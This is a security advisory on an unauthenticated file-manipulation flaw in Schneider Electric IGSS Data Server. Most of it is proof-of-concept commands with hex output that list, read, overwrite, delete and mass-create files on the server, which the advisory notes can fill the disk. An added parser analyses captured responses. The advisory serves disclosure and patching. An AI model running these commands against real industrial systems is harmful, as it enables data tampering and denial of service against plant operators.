
Schneider Electric IGSS Data Server v15.0.0.22139 Project Report Directory File Manipulation

High

Synopsis

Tenable found a Project Report Directory File Manipulation vulnerability in Schneider Electric IGSS data server (IGSSdataServer.exe) v15.0.0.22052.

An unauthenticated remote attacker can manipulate files in the IGSS project report directory: the attacker can list, read, delete and write files in that directory. With the write file command, the attacker can change the content of an existing file, or create a large number of new files to cause a denial-of-service condition (i.e., filling up the file system).

List files:

python3 igss_dataserver_file_op.py -t <target> -p 12401 list
Listing *.* in the IGSS project report directory...
res:
00000000: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000010: 32 32 30 32 32 33 31 39  2E 4C 4F 47 00 00 00 00  22022319.LOG....
00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000050: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000060: 32 32 30 32 32 33 32 30  2E 4C 4F 47 00 00 00 00  22022320.LOG....
00000070: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000080: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000090: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000A0: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
000000B0: 32 32 30 32 32 33 32 31  2E 4C 4F 47 00 00 00 00  22022321.LOG....
000000C0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000D0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000E0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
<...snip...>

Read file:

python3 igss_dataserver_file_op.py -t <target> -p 12401 read -f 22022319.LOG
Reading 22022319.LOG in the IGSS project report directory...
res:
00000000: 00 00 00 00 00 10 00 00  00 00 00 00 05 00 00 00  ................
00000010: EC 0F 00 00 17 00 AA AA  C0 68 06 00 30 30 30 35  .........h..0005
00000020: 30 2D 30 30 2D 58 2D 50  2D 31 2D 30 30 30 30 00  0-00-X-P-1-0000.
00000030: 01 00 00 00 00 B8 74 8E  E7 28 D8 01 20 75 D3 90  ......t..(.. u..
00000040: 67 B7 D6 01 E0 07 00 00  11 00 00 00 00 00 00 00  g...............
<...snip...>

Create a new file, list and read it:

python3 igss_dataserver_file_op.py -t <target> -p 12401 write -f test.txt
Writing 128 random characters to test.txt in the IGSS project report directory...
res:
00000000: 01 00 00 00 50 00 00 00  00 00 00 00 00 00 00 00  ....P...........
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................

python3 igss_dataserver_file_op.py -t <target> -p 12401 list txt
Listing *.txt in the IGSS project report directory...
res:
00000000: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000010: 74 65 73 74 2E 74 78 74  00 00 00 00 00 00 00 00  test.txt........
00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000050: 01 00 00 00 50 00 00 00  00 00 00 00 00 00 00 00  ....P...........
00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000070: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000080: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000090: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................

python3 igss_dataserver_file_op.py -t <target> -p 12401 read -f test.txt
Reading test.txt in the IGSS project report directory...
res:
00000000: 00 00 00 00 94 00 00 00  00 00 00 00 05 00 00 00  ................
00000010: 80 00 00 00 39 50 4E 36  32 47 34 44 35 4F 39 4E  ....9PN62G4D5O9N
00000020: 4E 32 4F 56 33 41 42 46  4A 55 53 49 56 58 31 38  N2OV3ABFJUSIVX18
00000030: 45 57 58 37 4E 4D 54 4D  56 50 38 4F 49 57 53 46  EWX7NMTMVP8OIWSF
00000040: 59 4C 41 31 4F 39 36 41  47 56 41 39 54 58 34 32  YLA1O96AGVA9TX42
00000050: 42 34 48 48 4F 50 48 30  37 47 55 50 41 39 4B 34  B4HHOPH07GUPA9K4
00000060: 52 53 42 48 44 55 36 44  34 4B 5A 4D 58 54 31 45  RSBHDU6D4KZMXT1E
00000070: 32 33 42 49 4B 53 5A 31  33 49 33 53 54 32 31 42  23BIKSZ13I3ST21B
00000080: 4E 31 44 4C 51 31 33 38  5A 30 36 4D 36 49 36 38  N1DLQ138Z06M6I68
00000090: 31 30 36 53 01 00 00 00  50 00 00 00 00 00 00 00  106S....P.......
000000A0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000C0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000D0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000E0: 00 00 00 00                                       ....

Change an existing file:

python3 igss_dataserver_file_op.py -t <target> -p 12401 write -f test.txt -s 256
Writing 256 random characters to test.txt in the IGSS project report directory...
res:
00000000: 01 00 00 00 50 00 00 00  00 00 00 00 00 00 00 00  ....P...........
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................

python3 igss_dataserver_file_op.py -t <target> -p 12401 read -f test.txt
Reading test.txt in the IGSS project report directory...
res:
00000000: 00 00 00 00 14 01 00 00  00 00 00 00 05 00 00 00  ................
00000010: 00 01 00 00 44 44 59 32  37 54 45 43 31 59 55 51  ....DDY27TEC1YUQ
00000020: 42 56 32 30 34 30 4B 53  45 45 45 45 32 31 54 54  BV2040KSEEEE21TT
00000030: 33 36 48 46 4D 45 38 5A  4B 31 51 51 45 37 38 58  36HFME8ZK1QQE78X
00000040: 4C 32 30 46 45 45 4F 33  46 36 58 51 4E 37 50 37  L20FEEO3F6XQN7P7
00000050: 38 39 4A 50 4C 43 4A 43  48 57 53 30 4B 34 4C 4D  89JPLCJCHWS0K4LM
00000060: 55 4E 42 52 4A 54 50 56  37 59 37 45 57 50 54 49  UNBRJTPV7Y7EWPTI
00000070: 4B 50 33 4E 39 47 30 36  42 59 39 58 46 55 53 32  KP3N9G06BY9XFUS2
00000080: 38 44 4E 39 30 45 54 4A  38 36 45 54 46 58 45 5A  8DN90ETJ86ETFXEZ
00000090: 39 4A 47 4D 39 43 4D 35  53 5A 41 38 59 35 35 5A  9JGM9CM5SZA8Y55Z
000000A0: 53 38 55 43 4A 36 54 35  30 58 52 4C 34 32 43 34  S8UCJ6T50XRL42C4
000000B0: 4E 48 54 50 4F 45 32 54  44 51 46 37 48 52 37 53  NHTPOE2TDQF7HR7S
000000C0: 4D 49 5A 58 48 30 30 55  38 43 56 36 32 51 5A 5A  MIZXH00U8CV62QZZ
000000D0: 42 49 49 39 36 4A 31 37  52 53 35 4F 44 44 53 58  BII96J17RS5ODDSX
000000E0: 43 37 50 34 42 47 47 54  52 4A 34 50 51 47 57 41  C7P4BGGTRJ4PQGWA
000000F0: 4B 57 30 42 32 56 41 57  42 5A 30 55 43 4F 33 48  KW0B2VAWBZ0UCO3H
00000100: 4E 4A 42 41 50 33 46 36  30 36 32 49 37 49 43 42  NJBAP3F6062I7ICB
00000110: 37 50 35 46 01 00 00 00  50 00 00 00 00 00 00 00  7P5F....P.......
00000120: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000130: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000140: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000150: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000160: 00 00 00 00                                       ....

Delete an existing file:

python3 igss_dataserver_file_op.py -t <target> -p 12401 delete -f test.txt
Deleting test.txt in the IGSS project report directory...
res:
00000000: 01 00 00 00 50 00 00 00  00 00 00 00 00 00 00 00  ....P...........
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................

python3 igss_dataserver_file_op.py -t <target> -p 12401 list txt
Listing *.txt in the IGSS project report directory...
res:
00000000: 01 00 00 00 50 00 00 00  00 00 00 00 00 00 00 00  ....P...........
00000010: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................

Create x number of files of y size:

python3 igss_dataserver_file_op.py -t <target> -p 12401 write -c 10 -s 200
Creating 10 random file(s) in the IGSS project report directory...
Writing 200 random characters to UT44M7H9E2.XXX in the IGSS project report directory...
Writing 200 random characters to K0LKRKJPRC.XXX in the IGSS project report directory...
Writing 200 random characters to 100UMN9X74.XXX in the IGSS project report directory...
Writing 200 random characters to 0G36NPJMQQ.XXX in the IGSS project report directory...
Writing 200 random characters to QWO1W6GKTI.XXX in the IGSS project report directory...
Writing 200 random characters to 6VZSN5RHHF.XXX in the IGSS project report directory...
Writing 200 random characters to HCGQQPNN71.XXX in the IGSS project report directory...
Writing 200 random characters to LF54X9U6JA.XXX in the IGSS project report directory...
Writing 200 random characters to 5KEYWNKX9V.XXX in the IGSS project report directory...
Writing 200 random characters to 5DVH68B2K0.XXX in the IGSS project report directory...

python3 igss_dataserver_file_op.py -t <target> -p 12401 list xxx
Listing *.xxx in the IGSS project report directory...
res:
00000000: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000010: 30 47 33 36 4E 50 4A 4D  51 51 2E 58 58 58 00 00  0G36NPJMQQ.XXX..
00000020: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000050: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000060: 31 30 30 55 4D 4E 39 58  37 34 2E 58 58 58 00 00  100UMN9X74.XXX..
00000070: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000080: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000090: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000A0: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
000000B0: 35 44 56 48 36 38 42 32  4B 30 2E 58 58 58 00 00  5DVH68B2K0.XXX..
000000C0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000D0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000E0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000000F0: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000100: 35 4B 45 59 57 4E 4B 58  39 56 2E 58 58 58 00 00  5KEYWNKX9V.XXX..
00000110: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000120: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000130: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000140: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000150: 36 56 5A 53 4E 35 52 48  48 46 2E 58 58 58 00 00  6VZSN5RHHF.XXX..
00000160: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000170: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000180: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000190: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
000001A0: 48 43 47 51 51 50 4E 4E  37 31 2E 58 58 58 00 00  HCGQQPNN71.XXX..
000001B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000001C0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000001D0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000001E0: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
000001F0: 4B 30 4C 4B 52 4B 4A 50  52 43 2E 58 58 58 00 00  K0LKRKJPRC.XXX..
00000200: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000210: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000220: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000230: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000240: 4C 46 35 34 58 39 55 36  4A 41 2E 58 58 58 00 00  LF54X9U6JA.XXX..
00000250: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000260: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000270: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000280: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
00000290: 51 57 4F 31 57 36 47 4B  54 49 2E 58 58 58 00 00  QWO1W6GKTI.XXX..
000002A0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000002B0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000002C0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
000002D0: 00 00 00 00 50 00 00 00  00 00 00 00 01 00 00 00  ....P...........
000002E0: 55 54 34 34 4D 37 48 39  45 32 2E 58 58 58 00 00  UT44M7H9E2.XXX..
000002F0: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000300: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000310: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000320: 01 00 00 00 50 00 00 00  00 00 00 00 00 00 00 00  ....P...........
00000330: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000340: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000350: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
00000360: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
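
For reviewing packet captures of responses sent from the data server port, the following added example (not part of Tenable's advisory or proof of concept) splits a response byte string into frames and reports which file names and file bytes it disclosed. The frame layout and the names `parse_frames`, `summarize`, `KIND_DIR_ENTRY` and `KIND_FILE_DATA` are assumptions inferred from the hex dumps above, not vendor documentation; the sample bytes are constructed.

```python
import struct

# Layout inferred from the hex dumps in this advisory (an assumption, not vendor
# documentation): each frame opens with four little-endian 32-bit words.
HEADER = struct.Struct("<IIII")  # final flag, frame length, unused, kind
KIND_DIR_ENTRY = 1               # payload: NUL-padded file name
KIND_FILE_DATA = 5               # payload: 32-bit byte count, then file bytes


def parse_frames(buf):
    """Split a captured response into (final, kind, payload) tuples."""
    frames, off = [], 0
    while off < len(buf):
        if len(buf) - off < HEADER.size:
            raise ValueError(f"truncated header at offset {off:#x}")
        final, length, _unused, kind = HEADER.unpack_from(buf, off)
        # The length word counts the 16-byte header, so it can never be smaller.
        if length < HEADER.size or off + length > len(buf):
            raise ValueError(f"bad frame length {length:#x} at offset {off:#x}")
        frames.append((final, kind, buf[off + HEADER.size:off + length]))
        off += length
    return frames


def summarize(buf):
    """Return (file names listed, file bytes returned) for one response."""
    names, data = [], b""
    for final, kind, payload in parse_frames(buf):
        if final:  # first word is 1 only in the closing frame of each dump
            break
        if kind == KIND_DIR_ENTRY:
            names.append(payload.split(b"\x00", 1)[0].decode("ascii", "replace"))
        elif kind == KIND_FILE_DATA:
            if len(payload) < 4:
                raise ValueError("file-data frame too short for its byte count")
            (count,) = struct.unpack_from("<I", payload)
            if count > len(payload) - 4:
                raise ValueError("byte count exceeds frame payload")
            data += payload[4:4 + count]
    return names, data


def _frame(final, kind, payload):
    """Build one constructed sample frame (test data only)."""
    return HEADER.pack(final, HEADER.size + len(payload), 0, kind) + payload


# Constructed samples modelled on the list and read dumps above.
_CLOSE = _frame(1, 0, bytes(0x40))
SAMPLE_LIST = (_frame(0, KIND_DIR_ENTRY, b"22022319.LOG".ljust(0x40, b"\x00"))
               + _frame(0, KIND_DIR_ENTRY, b"test.txt".ljust(0x40, b"\x00"))
               + _CLOSE)
SAMPLE_READ = _frame(0, KIND_FILE_DATA, struct.pack("<I", 4) + b"ABCD") + _CLOSE

if __name__ == "__main__":
    print(summarize(SAMPLE_LIST))
    print(summarize(SAMPLE_READ))
```

A capture that was cut short mid-frame raises `ValueError` instead of yielding a partial result.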

Solution

Schneider Electric have released IGSS Data Server V15.0.0.22140 which includes a fix for this vulnerability.

Proof of Concept

https://github.com/tenable/poc/blob/master/SchneiderElectric/IGSS/igss_dataserver_file_op.py

Disclosure Timeline

March 9, 2022 - Vulnerabilities discovered
April 11, 2022 - Vulnerabilities reported to vendor
April 11, 2022 - Vendor assigned case numbers 6392 and 6393
May 27, 2022 - Vendor stated they are finalizing the security notification for case 6393 and expect disclosure in June
June 7, 2022 - Tenable acknowledged update on case 6393 and requested CVE and fixed version information
June 8, 2022 - Vendor responded that CVE would be assigned at time of disclosure for case 6393
June 14, 2022 - Vendor informed Tenable that the advisory was released for case 6393

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.


Risk Information

CVE ID: CVE-2022-32528
Tenable Advisory ID: TRA-2022-23
CVSSv3 Base / Temporal Score: 8.6 / 8.0
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
Affected Products: Schneider Electric IGSS Data Server < 15.0.0.22140
Risk Factor: High

Advisory Timeline

June 15, 2022 - Advisory published
